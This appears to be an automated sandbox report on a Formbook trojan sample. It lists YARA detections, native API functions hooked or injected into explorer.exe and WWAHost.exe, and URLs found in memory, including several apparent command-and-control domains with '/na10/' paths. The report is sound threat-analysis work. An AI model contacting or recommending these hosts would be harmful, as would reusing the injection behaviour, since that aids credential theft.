  • http://www.osthirmaker.comReferer:
  • http://www.productivagc.com
  • http://www.productivagc.com/na10/
  • http://www.productivagc.com/na10/www.dexcoenergy.com
  • http://www.productivagc.comReferer:
  • http://www.sasoera.com
  • http://www.sasoera.com/na10/
  • http://www.sasoera.com/na10/www.liamcollinai.com
  • http://www.sasoera.comReferer:
  • http://www.snykee.com
  • http://www.snykee.com/na10/
  • http://www.snykee.com/na10/www.awclog.com
  • http://www.snykee.comReferer:
  • http://www.thelonelyteacup.com
  • http://www.thelonelyteacup.com/na10/
  • http://www.thelonelyteacup.com/na10/www.snykee.com
  • http://www.thelonelyteacup.comReferer:
Source: explorer.exe, 00000007.00000000.2509419071.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2652534535.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2509419071.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3306031223.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000007.00000002.3305263776.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2508398700.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000007.00000002.3299618126.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2499817163.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000007.00000000.2502264257.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000007.00000002.3299618126.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2499817163.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000007.00000000.2498190628.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651889553.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3296372597.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009B86000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2651644758.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094394902.0000000009D42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000007.00000000.2508398700.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3305263776.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon

          E-Banking Fraud

          Source: Yara match | File source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.3301684101.0000000009270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d | Author: unknown
          Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: Process Memory Space: yaM8XR1HfL.exe PID: 1288, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: Process Memory Space: WWAHost.exe PID: 4424, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2B60 NtClose,LdrInitializeThunk | 4_2_014C2B60
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 4_2_014C2BF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2AD0 NtReadFile,LdrInitializeThunk | 4_2_014C2AD0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2D10 NtMapViewOfSection,LdrInitializeThunk | 4_2_014C2D10
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2D30 NtUnmapViewOfSection,LdrInitializeThunk | 4_2_014C2D30
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2DD0 NtDelayExecution,LdrInitializeThunk | 4_2_014C2DD0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2DF0 NtQuerySystemInformation,LdrInitializeThunk | 4_2_014C2DF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2C70 NtFreeVirtualMemory,LdrInitializeThunk | 4_2_014C2C70
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2CA0 NtQueryInformationToken,LdrInitializeThunk | 4_2_014C2CA0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2F30 NtCreateSection,LdrInitializeThunk | 4_2_014C2F30
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2FE0 NtCreateFile,LdrInitializeThunk | 4_2_014C2FE0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2F90 NtProtectVirtualMemory,LdrInitializeThunk | 4_2_014C2F90
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2FB0 NtResumeThread,LdrInitializeThunk | 4_2_014C2FB0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2E80 NtReadVirtualMemory,LdrInitializeThunk | 4_2_014C2E80
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk | 4_2_014C2EA0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C4340 NtSetContextThread | 4_2_014C4340
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C4650 NtSuspendThread | 4_2_014C4650
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2BE0 NtQueryValueKey | 4_2_014C2BE0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2B80 NtQueryInformationFile | 4_2_014C2B80
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2BA0 NtEnumerateValueKey | 4_2_014C2BA0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2AF0 NtWriteFile | 4_2_014C2AF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2AB0 NtWaitForSingleObject | 4_2_014C2AB0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2D00 NtSetInformationFile | 4_2_014C2D00
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2DB0 NtEnumerateKey | 4_2_014C2DB0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2C60 NtCreateKey | 4_2_014C2C60
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2C00 NtQueryInformationProcess | 4_2_014C2C00
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2CC0 NtQueryVirtualMemory | 4_2_014C2CC0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2CF0 NtOpenProcess | 4_2_014C2CF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2F60 NtCreateProcessEx | 4_2_014C2F60
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2FA0 NtQuerySection | 4_2_014C2FA0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2E30 NtWriteVirtualMemory | 4_2_014C2E30
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C2EE0 NtQueueApcThread | 4_2_014C2EE0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C3010 NtOpenDirectoryObject | 4_2_014C3010
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C3090 NtSetValueKey | 4_2_014C3090
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C35C0 NtCreateMutant | 4_2_014C35C0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C39B0 NtGetContextThread | 4_2_014C39B0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C3D70 NtOpenThread | 4_2_014C3D70
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 4_2_014C3D10 NtOpenProcessToken | 4_2_014C3D10
          Source: C:\Windows\explorer.exe | Code function: 7_2_09258232 NtCreateFile | 7_2_09258232
          Source: C:\Windows\explorer.exe | Code function: 7_2_09259E12 NtProtectVirtualMemory | 7_2_09259E12
          Source: C:\Windows\explorer.exe | Code function: 7_2_09259E0A NtProtectVirtualMemory | 7_2_09259E0A
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_0014E0F0 GetCurrentProcess,NtQueryInformationProcess,QuirkIsEnabled,#90,InitOnceExecuteOnce,#157 | 9_2_0014E0F0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_001A3774 GetCurrentProcess,NtSetInformationProcess | 9_2_001A3774
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_001A37AC NtQuerySystemInformation | 9_2_001A37AC
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_00147E90 NtQueryInformationToken,HeapAlloc,memset,NtQueryInformationToken,RtlInitUnicodeString,RtlCompareUnicodeString,RtlNtStatusToDosErrorNoTeb,RtlNtStatusToDosErrorNoTeb,HeapFree | 9_2_00147E90
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2C60 NtCreateKey,LdrInitializeThunk | 9_2_040C2C60
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2C70 NtFreeVirtualMemory,LdrInitializeThunk | 9_2_040C2C70
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2CA0 NtQueryInformationToken,LdrInitializeThunk | 9_2_040C2CA0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2D10 NtMapViewOfSection,LdrInitializeThunk | 9_2_040C2D10
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2DD0 NtDelayExecution,LdrInitializeThunk | 9_2_040C2DD0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2DF0 NtQuerySystemInformation,LdrInitializeThunk | 9_2_040C2DF0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk | 9_2_040C2EA0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2F30 NtCreateSection,LdrInitializeThunk | 9_2_040C2F30
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2FE0 NtCreateFile,LdrInitializeThunk | 9_2_040C2FE0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2AD0 NtReadFile,LdrInitializeThunk | 9_2_040C2AD0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2B60 NtClose,LdrInitializeThunk | 9_2_040C2B60
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2BE0 NtQueryValueKey,LdrInitializeThunk | 9_2_040C2BE0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 9_2_040C2BF0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C35C0 NtCreateMutant,LdrInitializeThunk | 9_2_040C35C0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C4650 NtSuspendThread | 9_2_040C4650
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C4340 NtSetContextThread | 9_2_040C4340
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2C00 NtQueryInformationProcess | 9_2_040C2C00
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2CC0 NtQueryVirtualMemory | 9_2_040C2CC0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2CF0 NtOpenProcess | 9_2_040C2CF0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2D00 NtSetInformationFile | 9_2_040C2D00
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2D30 NtUnmapViewOfSection | 9_2_040C2D30
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2DB0 NtEnumerateKey | 9_2_040C2DB0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2E30 NtWriteVirtualMemory | 9_2_040C2E30
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2E80 NtReadVirtualMemory | 9_2_040C2E80
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2EE0 NtQueueApcThread | 9_2_040C2EE0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2F60 NtCreateProcessEx | 9_2_040C2F60
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2F90 NtProtectVirtualMemory | 9_2_040C2F90
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2FA0 NtQuerySection | 9_2_040C2FA0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2FB0 NtResumeThread | 9_2_040C2FB0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2AB0 NtWaitForSingleObject | 9_2_040C2AB0
          Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 9_2_040C2AF0 NtWriteFile | 9_2_040C2AF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exe | Code function: 0_2_07685CA0 CreateProcessAsUserW | 0_2_07685CA0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015416CC4_2_015416CC
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014999504_2_01499950
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AB9504_2_014AB950
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_015259104_2_01525910
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014FD8004_2_014FD800
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014938E04_2_014938E0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154FB764_2_0154FB76
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01505BF04_2_01505BF0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014CDBF94_2_014CDBF9
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AFB804_2_014AFB80
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01547A464_2_01547A46
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154FA494_2_0154FA49
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01503A6C4_2_01503A6C
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0153DAC64_2_0153DAC6
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014D5AA04_2_014D5AA0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01531AA34_2_01531AA3
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0152DAAC4_2_0152DAAC
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01493D404_2_01493D40
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01541D5A4_2_01541D5A
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01547D734_2_01547D73
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_014AFDC04_2_014AFDC0
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01509C324_2_01509C32
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154FCF24_2_0154FCF2
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154FF094_2_0154FF09
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01453FD54_2_01453FD5
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01453FD24_2_01453FD2
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01491F924_2_01491F92
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_0154FFB14_2_0154FFB1
          Source: C:\Users\user\Desktop\yaM8XR1HfL.exeCode function: 4_2_01499EB04_2_01499EB0
          Source: C:\Windows\explorer.exeCode function: 7_2_092582327_2_09258232
          Source: C:\Windows\explorer.exeCode function: 7_2_09252B307_2_09252B30
          Source: C:\Windows\explorer.exeCode function: 7_2_09252B327_2_09252B32
          Source: C:\Windows\explorer.exeCode function: 7_2_0924FD027_2_0924FD02
          Source: C:\Windows\explorer.exeCode function: 7_2_092559127_2_09255912
          Source: C:\Windows\explorer.exeCode function: 7_2_0925B5CD7_2_0925B5CD
          Source: C:\Windows\explorer.exeCode function: 7_2_092570367_2_09257036
          Source: C:\Windows\explorer.exeCode function: 7_2_0924E0827_2_0924E082
          Source: C:\Windows\explorer.exeCode function: 7_2_106E00367_2_106E0036
          Source: C:\Windows\explorer.exeCode function: 7_2_106D70827_2_106D7082
          Source: C:\Windows\explorer.exeCode function: 7_2_106D8D027_2_106D8D02
          Source: C:\Windows\explorer.exeCode function: 7_2_106DE9127_2_106DE912
          Source: C:\Windows\explorer.exeCode function: 7_2_106E45CD7_2_106E45CD
          Source: C:\Windows\explorer.exeCode function: 7_2_106E12327_2_106E1232
          Source: C:\Windows\explorer.exeCode function: 7_2_106DBB307_2_106DBB30
          Source: C:\Windows\explorer.exeCode function: 7_2_106DBB327_2_106DBB32
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_001600909_2_00160090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00126BA39_2_00126BA3
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00126BA89_2_00126BA8
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00164CE09_2_00164CE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_00170EF09_2_00170EF0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_001270369_2_00127036
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_001713379_2_00171337
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041344209_2_04134420
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041424469_2_04142446
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0413E4F69_2_0413E4F6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040905359_2_04090535
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041505919_2_04150591
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040AC6E09_2_040AC6E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040B47509_2_040B4750
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040907709_2_04090770
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0408C7C09_2_0408C7C0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041220009_2_04122000
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040801009_2_04080100
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0412A1189_2_0412A118
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041181589_2_04118158
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041441A29_2_041441A2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041501AA9_2_041501AA
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041481CC9_2_041481CC
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041302749_2_04130274
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041102C09_2_041102C0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0414A3529_2_0414A352
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_041503E69_2_041503E6
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0409E3F09_2_0409E3F0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_04090C009_2_04090C00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_04130CB59_2_04130CB5
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_04080CF29_2_04080CF2
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0409AD009_2_0409AD00
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0412CD1F9_2_0412CD1F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_040A8DBF9_2_040A8DBF
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0408ADE09_2_0408ADE0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0414EE269_2_0414EE26
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_04090E599_2_04090E59
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0414CE939_2_0414CE93
